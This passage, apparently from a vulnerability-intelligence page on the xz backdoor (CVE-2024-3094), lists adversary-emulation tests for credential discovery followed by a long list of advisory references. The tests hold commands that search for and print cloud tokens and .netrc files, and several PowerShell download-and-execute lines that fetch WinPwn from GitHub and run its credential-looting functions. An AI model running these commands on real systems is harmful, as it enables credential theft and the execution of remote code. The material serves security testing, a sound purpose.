Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (56)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2024-3094
access.redhat.com
GitHub CVE vdb-entry x_refsource_REDHAT
https://access.redhat.com/security/cve/CVE-2024-3094
bugzilla.redhat.com
GitHub CVE issue-tracking x_refsource_REDHAT
https://bugzilla.redhat.com/show_bug.cgi?id=2272210
openwall.com
GitHub CVE
https://www.openwall.com/lists/oss-security/2024/03/29/4
redhat.com
GitHub CVE
https://www.redhat.com/en/blog/urgent-security-alert-fedora-41-and-rawhide-users
openwall.com
NVD API
http://www.openwall.com/lists/oss-security/2024/03/29/10
openwall.com
NVD API
http://www.openwall.com/lists/oss-security/2024/03/29/12
openwall.com
NVD API
http://www.openwall.com/lists/oss-security/2024/03/29/4
openwall.com
NVD API
http://www.openwall.com/lists/oss-security/2024/03/29/5
openwall.com
NVD API
http://www.openwall.com/lists/oss-security/2024/03/29/8
openwall.com
NVD API
http://www.openwall.com/lists/oss-security/2024/03/30/12
openwall.com
NVD API
http://www.openwall.com/lists/oss-security/2024/03/30/27
openwall.com
NVD API
http://www.openwall.com/lists/oss-security/2024/03/30/36
openwall.com
NVD API
http://www.openwall.com/lists/oss-security/2024/03/30/5
openwall.com
NVD API
http://www.openwall.com/lists/oss-security/2024/04/16/5
ariadne.space
NVD API
https://ariadne.space/2024/04/02/the-xz-utils-backdoor-is-a-symptom-of-a-larger-problem/
arstechnica.com
NVD API Third Party Advisory
https://arstechnica.com/security/2024/03/backdoor-found-in-widely-used-linux-utility-breaks-encrypted-ssh-connections/
aws.amazon.com
NVD API Third Party Advisory
https://aws.amazon.com/security/security-bulletins/AWS-2024-002/
blog.netbsd.org
NVD API
https://blog.netbsd.org/tnf/entry/statement_on_backdoor_in_xz
boehs.org
NVD API Third Party Advisory
https://boehs.org/node/everything-i-know-about-the-xz-backdoor
bugs.debian.org
NVD API Mailing List Vendor Advisory
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1068024
bugs.gentoo.org
NVD API Issue Tracking Third Party Advisory
https://bugs.gentoo.org/928134
bugzilla.suse.com
NVD API Issue Tracking Third Party Advisory
https://bugzilla.suse.com/show_bug.cgi?id=1222124
discourse.nixos.org
NVD API Third Party Advisory
https://discourse.nixos.org/t/cve-2024-3094-malicious-code-in-xz-5-6-0-and-5-6-1-tarballs/42405
gist.github.com
NVD API Third Party Advisory
https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27
github.com
NVD API Third Party Advisory
https://github.com/advisories/GHSA-rxwq-x6h5-x525
github.com
NVD API
https://github.com/amlweems/xzbot
github.com
NVD API Third Party Advisory
https://github.com/karcherm/xz-malware
gynvael.coldwind.pl
NVD API Technical Description Third Party Advisory
https://gynvael.coldwind.pl/?lang=en&id=782
lists.debian.org
NVD API Mailing List Third Party Advisory
https://lists.debian.org/debian-security-announce/2024/msg00057.html
lists.freebsd.org
NVD API Third Party Advisory
https://lists.freebsd.org/archives/freebsd-security/2024-March/000248.html
lwn.net
NVD API Issue Tracking Third Party Advisory
https://lwn.net/Articles/967180/
news.ycombinator.com
NVD API Issue Tracking Third Party Advisory
https://news.ycombinator.com/item?id=39865810
news.ycombinator.com
NVD API Issue Tracking
https://news.ycombinator.com/item?id=39877267
news.ycombinator.com
NVD API
https://news.ycombinator.com/item?id=39895344
openssf.org
NVD API Third Party Advisory
https://openssf.org/blog/2024/03/30/xz-backdoor-cve-2024-3094/
research.swtch.com
NVD API
https://research.swtch.com/xz-script
research.swtch.com
NVD API
https://research.swtch.com/xz-timeline
security-tracker.debian.org
NVD API Third Party Advisory
https://security-tracker.debian.org/tracker/CVE-2024-3094
security.alpinelinux.org
NVD API Third Party Advisory
https://security.alpinelinux.org/vuln/CVE-2024-3094
security.archlinux.org
NVD API Third Party Advisory
https://security.archlinux.org/CVE-2024-3094
security.netapp.com
NVD API
https://security.netapp.com/advisory/ntap-20240402-0001/
tukaani.org
NVD API Issue Tracking Vendor Advisory
https://tukaani.org/xz-backdoor/
twitter.com
NVD API Third Party Advisory
https://twitter.com/LetsDefendIO/status/1774804387417751958
twitter.com
NVD API Press/Media Coverage
https://twitter.com/debian/status/1774219194638409898
twitter.com
NVD API Press/Media Coverage
https://twitter.com/infosecb/status/1774595540233167206
twitter.com
NVD API Press/Media Coverage
https://twitter.com/infosecb/status/1774597228864139400
ubuntu.com
NVD API Third Party Advisory
https://ubuntu.com/security/CVE-2024-3094
binarly.io
NVD API
https://www.binarly.io/blog/persistent-risk-xz-utils-backdoor-still-lurking-in-docker-images
cisa.gov
NVD API Third Party Advisory US Government Resource
https://www.cisa.gov/news-events/alerts/2024/03/29/reported-supply-chain-compromise-affecting-xz-utils-data-compression-library-cve-2024-3094
darkreading.com
NVD API Third Party Advisory
https://www.darkreading.com/vulnerabilities-threats/are-you-affected-by-the-backdoor-in-xz-utils
kali.org
NVD API
https://www.kali.org/blog/about-the-xz-backdoor/
tenable.com
NVD API Third Party Advisory
https://www.tenable.com/blog/frequently-asked-questions-cve-2024-3094-supply-chain-backdoor-in-xz-utils
theregister.com
NVD API Press/Media Coverage
https://www.theregister.com/2024/03/29/malicious_backdoor_xz/
vicarius.io
NVD API
https://www.vicarius.io/vsociety/vulnerabilities/cve-2024-3094
xeiaso.net
NVD API Third Party Advisory
https://xeiaso.net/notes/2024/xz-vuln/